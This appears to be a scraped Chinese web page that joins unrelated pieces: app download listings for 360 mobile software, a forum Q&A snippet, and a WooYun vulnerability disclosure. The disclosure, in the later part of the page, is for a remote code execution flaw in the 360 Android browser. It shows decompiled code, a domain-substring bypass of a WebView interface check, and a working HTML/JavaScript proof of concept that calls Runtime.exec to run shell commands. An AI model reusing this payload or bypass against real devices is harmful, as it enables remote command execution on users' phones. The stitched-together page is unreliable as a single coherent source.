安卓软件相关分类
常用装机软件
软件标签：
软件授权：官方版
更新时间： 20:55:13
软件类型：国产软件
软件大小：8.00 MB
软件语言：简体中文　
应用平台：安卓/
360手机专家――手机有问题，专家来帮您！安卓手机很多功能藏得比较深，大家可能根本找不到或不会用，如手机连不上电脑、连不上网，怎么截屏等，360手机专家就是解决此类问题的利器。&基本上这个跟360&PC上的电脑专家是一样的，这个对于手机小白用户来说可谓是入门宝典+解决神器，遇到问题也可以免去找教程之类的了。【更新日志】360手机专家&2.0.0.0125安卓版1、支持更多手机进行无线人工服务2、优化手机人工服务流程【编辑点评】&来自于奇虎360的又一款手机软件新品，适用于入门级的菜鸟们对于一些常规常见的问题的咨询和解答。感觉还行，覆盖的内容信息量还不错！
软件下载　　　
点击以下链接下载360手机专家2.0.0.0125安卓版　　
相关资源　　　
?上一软件：
?下一软件：
　华彩软件站的所有软件都经过严格安装检测,如发现有病毒木马或不能下载,请()反馈。
　推荐使用[]等专业工具下载本站软件,可获取最高速的下载速度。
　请尽量使用[]或[]等解压缩工具,这样能确保您下载的软件运行正常。
　若下载的软件压缩包有加密,密码将是
　华彩软件站中所包含的破解版及注册码均搜集自互联网,如果上述行为侵犯到您的权益,敬请通知。
　感谢您对本站的支持,欢迎您加入华彩软件站用户QQ群①(满),QQ群②，进行交流！安全市场联盟开放平台
如果你是应用开发者欢迎提交软件到360
下载的人还喜欢
本类热门应用
【小编点评】丰富软件和游戏，好用的智能手机管理应用
用安卓手机，当然装安卓市场！
最丰富的应用和游戏，一亿用户第一选择
最智能的下载和升级，节省流量高达90%
最高效的审核和把控，手机安全远离病毒
【更新内容】v4.5.8版本更新说明：
1、一键装机：玩转安卓必备软件，赢在起跑线；
2、游戏“魔”盒：无需下载，新奇特游戏现装现玩；
3、猜你想搜：即搜即得，快速找到中意软件。
保持登录状态
您的赞美就是给作者最大的回报，觉得好就表扬TA一下吧。
还可以输入200字
该应用暂时还没有评论，沙发空缺中。
应用评分：6.8分
大家的选择就是正确的选择，你值得拥有
请先下载此应用，才可对其评分。
我来评分：
通过360手机卫士检测
安全无毒，可放心下载。
需要调用以下重要权限
-&开机自动启动-&禁用系统锁屏-&获取手机地理位置-&修改联系人信息
-&访问网络-&获取WiFi状态-&获取网络状态-&读取电话状态-&清除应用缓存-&读取系统日志-&拨打电话
Copyright&2005- All Rights Reserved 360安全中心[1回答]安卓系统和360冲突吗？_ _手机问题_刷机专家（卓大师）
安卓系统和360冲突吗？
网友()问于
o 系统(4.1.2
) o Root权限(已获取)
安卓系统和360，不冲突i。
热心网友()回答于
0个赞同 o 0个反对
专家简介：原卓大师，专注刷机领域，业内元老级应用。
专家宣言：让您一键轻松解决刷机烦恼！
版本：5.6.0大小：14.54MB
版本：2.7.0大小：2.84MB
大师简介：业内最强ROOT软件，轻松ROOT。
大师宣言：让您一键轻松解决ROOT烦恼！
版本：2.8.0大小：9.31MB
版本：3.3.0大小：5.5MB
大师简介：免ROOT直接安装字体，个性化定制手机。
大师宣言：万千字体，想换就换！
版本：3.9.0大小：5.2MB
相关解决问题列表
(C) 2007 - 2015
北京耘升天下科技有限公司
帮助与支持
关注卓大师官方微信
获取最新潮刷机资讯
还没有卓大师的账号?
或使用其他帐号登录:360手机卫士是一款Android平台完全免费的手机安全软件，集防垃圾短信，防骚扰电话，防隐私泄漏，对手机进行安全扫描，联网云查杀恶意软件，联网行为实时监控，长途电话IP自动拨号，系统清理手机加速，电话归属地显示及查询等功能于一身。
软件功能特色：
360手机卫士为您带来便捷实用的功能，全方位的手机安全及隐私保护。1.支持双卡拦截功能，拦截更全面2.支持双卡流量管理，为每张卡设置不同套餐，限额及提醒，轻松管理每张卡的流量3.支持双卡话费查询，详细了解每张卡的消费情况，杜绝扣费侵扰4.支持双卡IP自动拨号，可为每张卡设置不同的策略，方便拨打长途时节约话费5.支持双卡手机防盗保护，更换其中一张卡之后就会发送换卡通知短信，双卡接收指令通知，助您更快找回手机。该版本手机卫士支持MTK6513、MTK6573、MTK6575系列手机
杀毒快速扫描手机中已安装的软件，发现病毒木马和恶意软件，一键操作，彻底查杀•联网云查杀确认可疑软件，获得最佳保护。 体检随时为您检查健康状况，一键快速清理。 备份备份通讯录、短信、隐私记录和手机卫士设置到360云安全中心，随时恢复，方便转移数据到其他手机，手机被盗也不怕，从此拥有一个无限量的云存储空间。流量统计GPRS、3G和wifi各种流量数据，清晰展现，累积显示当月使用量。让您完全掌控流量使用情况，防止超额使用之后产生高昂的费用。拦截将垃圾短信和骚扰电话添加到黑名单，帮助您拦截各类骚扰 垃圾信息和骚扰通话记录提供图标提醒，避免给您打扰 灵活的设置拦截规则，可以自己量身定制防骚扰方案将垃圾短信和骚扰电话添加到黑名单，帮助您拦截各类骚扰 垃圾信息和骚扰通话记录提供图标提醒，避免给您打扰 灵活的设置拦截规则，可以自己量身定制防骚扰方案
1、强力杀毒：360专业杀毒引擎，保障您的手机免受病毒侵扰；&
2、骚扰拦截：自动拦截垃圾短信与骚扰电话，骚扰行为瞬间曝光；&
3、绚丽来电秀：来电显示真人图像，让通话变得更有爱，秀出我的自信与态度；&
4、手机防盗：换卡短信通知，追踪手机位置，远程删除手机数据。&
常见问题：
如何退出360手机安全卫士：
打开360手机卫士界面点击设置中心，拉到最下方，点击退出按钮。
安全卫士绑定手机后如何定位：
用安全手机号，发送weizhi#防盗密码指令就可以给开启了手机防盗的那手机定位了。
1、新增软件权限一键设置，轻松保护个人隐私；&
2、新增权限用途的详细描述，详细了解每个权限的用途；&
3、强化恶意URL拦截能力；&
4、提升支付环境检测和保护能力。
1.悬浮窗增加春节抢票入口;2.提高软件稳定性;3.修复bug。
手机卫士Android版更新V4.2.5正式版1.保护缴费和网银安全；2.新增隐私空间数据备份；3.高危手机挂马漏洞扫描；4.大文件安全扫描；5.存储空间不足提醒；6.云标记动画改版；7.优化程序锁。
手机卫士Android版更新V4.2.1beta版1.手机备份功能全新升级，支持手机全备份！2.支持软件游戏存档备份，跨机玩游戏，存档不怕丢！3.支持图片音乐视频备份到云盘，跨终端轻松查看！
支持包括如下机型：
康佳: W810 E810 E860 E5670长虹: Z1 V7 V7mini W3 V8 W22国虹: T618 T628 T638 W100联想: A60 P70熠鼎: A102 A102+优美: 手机本TCL : OT985中兴: v6500欧新: U5E派 : EBEST V6夏新: N807聆韵: u880 U910JPA : G17乐派: NETPAL A8大显: M500
其他版本下载
360手机卫士安卓版官方下载360手机卫士 v5.3.5 官方安卓通用版
+ 投诉 + 提问有问
相关关键词:
本类最新更新
平安wifi app是平安推出的一款手机免费wifi应用软件，在该应用中用户可以连接免费wifi，免费
富士康智联云网客户端是一款专为富士康员工宿舍打造的免费上网的手机应用软件，在该应用中用
华为应用市场app是华为官方推出的一款下载中心，在该应用中可以免费下载各种海量正版绿色的应
微信蒙文输入法chimee是一款蒙古语输入法手机应用软件，在该应用中用户可以轻松在微信中用蒙
常用工具热门排行
本类精品软件
11.5M/中文/10.0
ITMOP专题推荐
热门电脑软件分享漏洞：
披露状态：
： 细节已通知厂商并且等待厂商处理中
： 厂商已经确认，细节仅向厂商公开
： 细节向第三方安全合作伙伴开放
： 细节向核心白帽子及相关领域专家公开
： 细节向普通白帽子公开
： 细节向实习白帽子公开
： 细节向公众公开
简要描述：
关键时刻，怎能少了 360，360 浏览器一样存在问题，同样预警！over！
详细说明：
没错就是安卓的那个 webview 的远程代码执行漏洞。之所以到现在没人报是因为隐藏的稍微那么深一点，废话少说下面走起。
1、用我们的方法测试下，访问含有下面代码的页面来让我们目测下：
code 区域&script type=&text/javascript&&
for(w in window){
document.write(w + &&br/&&);
上面代码是遍历所有的 window 对象，经过目测都是系统对象，并没有看到 360 浏览器有通过 addJavascriptInterface 公开方法出来。
2、真的没有么？深入挖掘下看看呢。在官方下载 apk 文件，反编译（过程略）。通过 jd-gui 在反编译后带的代码中搜索 addJavascriptInterface 关键字，找到了如下的代码：
code 区域public static void addJavascriptInterface(ace paramace)
if ((paramace == null) || (!a(paramace)));
while (true)
paramace.addJavascriptInterface(new aho(), &Js2Java&);
catch (Exception localException)
localException.printStackTrace();
看代码公开 Js2Java 方法是需要一定条件才能够触发的，那我们就来找到触发的条件。
由于 jar 反编译成 java 代码并不是原生的 java 代码并且逻辑上也比较奇怪，所以我们就大致来判断吧，看下面：
if ((paramace == null) || (!a(paramace)));
这对 paramace 进行是空以及通过 a 函数来判断，随后才会进入到 addJavascriptInterface 流程。
我们继续跟进 a 函数：
code 区域private static boolean a(ace paramace)
boolean bool =
String str1 = paramace.getUrl();
if (!avf.a(str1))
String str2 = Uri.parse(str1).getHost();
String[] arrayOfString =
int i = arrayOfString.
if (j & i)
if (str2.contains(arrayOfString[j]))
bhr.c(&JSInterfaceHandler&, &this url CAN add javascript interface url = & + str1);
while (true)
bhr.c(&JSInterfaceHandler&, &this url CANOT add javascript interface url = & + str1);
通过这段代码我们就又能够了解更多的信息，关键代码为：
code 区域if (str2.contains(arrayOfString[j]))
bhr.c(&JSInterfaceHandler&, &this url CAN add javascript interface url = & + str1);
通过判断 str2 这个字符串是否包含 arrayOfString[j]) 来决定是否公开 Js2Java 方法。str2 通过代码可以看到是当前 url 的 host 值。arrayOfString[j]) 呢？我们在上面的代码中又找到了：
code 区域static
String[] arrayOfString = new String[1];
arrayOfString[0] = &&;
到这里我们有个大致清晰的思路就是，如果当前访问的页面域名为 ，我们就能够通过 JavaScript 来调用 Js2Java 方法。
3、我最先想到的就是通过修改手机上 hosts 文件把
这个域名指向我们自己的服务器来判断我们的判断是否正确。修改后直接访问含有上面那段列出 window 对象的代码页面。发现没有 Js2Java，诡异，难道我们的判断出现错误了么（这里其实是一个坑，下面会提到）？
4、有点不甘心啊，会过去看代码，我们看到一个地方：
bhr.c(&JSInterfaceHandler&, &this url CAN add javascript interface url = & + str1);
这里看起来像是调试日志，然后我们把手机连接上电脑，通过 adb logcat 来看是否有日志打印出来。分别访问
域名，发现没有任何日志打印出来。
5、我…，打住，淡定点。缕一下。没有日志输出是不是会有类似于一个开关的呢，毕竟 360 的开发人员也是专业的么，好既然是通过 bhr.c 来输出的日志，我们就跟过去看看：
code 区域public static int c(String paramString1, String paramString2)
if ((!a) || (paramString2 == null));
for (int i = 0; ; i = Log.e(paramString1, paramString2))
从上面看的确是通过 Log.e 来打印的日志，但是有个逻辑就是 a 变量，在前面我们找到了：
public static boolean a = avc.a;
a 是一个布尔值，是由 avc.a 来控制的，跟进去：
public static boolean a =
看到这里是 false ，果然，如果能够改为 true 就应该能够打印出日志的。
6、既然前方有曙光，我们就不要停止脚步。之前我们通过烦编辑 apk 得到源代码了。既然是在 avc 这个文件里面定义的，我们就找到之前反编译得到的 avc.smali 文件，找到如下的代码：
code 区域const/4 v2, 0x0
#v2=(One);
sput-boolean v2, L-&a:Z
sput-boolean v2, L-&b:Z
sput-boolean v2, L-&e:Z
这里是定义 a 变量的值，我们修改为：
code 区域const/4 v2, 0x1
#v2=(One);
sput-boolean v2, L-&a:Z
const/4 v2, 0x0
sput-boolean v2, L-&b:Z
sput-boolean v2, L-&e:Z
把 a 的值改为 1，其他保持不变。重新打包，签名，再次安装。
然后在电脑端的终端中输入：adb logcat | grep JSInterfaceHandler 来过滤日志输出，这个时候手机访问
就可以看到日志了：
code 区域xxx@xxx:~ $ adb logcat | grep JSInterfaceHandler
E/JSInterfaceHandler(23409): this url CANOT add javascript interface url = /
E/JSInterfaceHandler(23409): this url CAN add javascript interface url = /?qtrad=1
再次证明之前我们的判断是正确的，但是问题出在哪里呢？
7、这样的话我们就需要一个
域下的 xss，xss，xss，xss，好烦啊，可我还是去找了会，突然，别激动，不是找到 xss 了，而是我们忽略了之前一个问题。就是这里：
str2.contains(arrayOfString[j])
这里只是一个包含的关系，并不是等于的关系，那么你懂了么？只要我们的域名中含有
就可以绕过这个逻辑了，哈哈哈哈哈哈哈哈哈哈哈。
我们吧 .hongmei.me 解析到我们的服务器上面，访问。
纳尼，没有任何日志输出。我…。
8、淡定，肯定是有哪里不对，我直接把
首页下载到服务器上面，再次访问，哈哈，有了。看来是会判断页面中的元素了，这就是前面提到的坑，最开始我们的代码只有一个 script 标签。下面是日志：
E/JSInterfaceHandler(23409): this url CAN add javascript interface url = .hongmei.me/360_poc.html
多么美好的一句话啊，从来没有对英文这么有好感过。
9、既然，那么。好吧下面就是我们最终的 POC：
code 区域&!DOCTYPE html&
&meta charset=&utf-8&&
&script type=&text/javascript&&
if(window.Js2Java){
Js2Java.getClass().forName(&java.lang.Runtime&).getMethod(&getRuntime&,null).invoke(null,null).exec([&/system/bin/sh&,&-c&,&echo '360 mobile browser for android remote command execute' & /sdcard/360.txt&]);
alert('good job');
}catch(e){
&title&360 mobile browser remote command execute poc&/title&
10、再次访问我们的 POC 链接：
.hongmei.me/360_poc.html
然后就去看执行的效果吧。
漏洞证明：
修复方案：
1、可以考虑严格的过滤方案吧。
版权声明：转载请注明来源 @
厂商回应：
危害等级：高
漏洞Rank：10
确认时间： 13:12
厂商回复：
针对WebView中的接口安全问题，之前360手机浏览器已经做了防护措施。感谢乌云白帽子反馈，帮助我们找到了一处防护缺陷，现已推出新版修复，欢迎继续关注测试。
最新状态：
漏洞评价：
对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
给自己顶下。
我也来......
小伙子 帅呆了 原来poc就差那么一点点
360这里还有一个帖子。。/thread--1.html @奇虎360 叫你同事改一下吧 哈哈
自己打脸啊
@北京方便面 他会不会说内部已经发现，在处理中了？
火钳留名！
@只抽红梅 那些都无所谓了 重要的是给它报出来
@北京方便面 说，你是哪个单位的，你是谁的马甲！
&360安全中心监测到漏洞信息后，第一时间进行了分析&
结果截图是wooyun的图，它妹的不厚道
火钳留名！
@wokao 图：乌云漏洞平台曝光微信等多款安卓应用存在高危漏洞 在乌云漏洞平台上，包括安卓版微信、QQ、腾讯微博、QQ浏览器、快播、百度浏览器、金山浏览器等大批应用均被曝光同类型漏洞。
数字公司还稍微靠谱一点。
@小胖子 是的 不过这看起来也更有看头啊
登录后才能发表评论，请先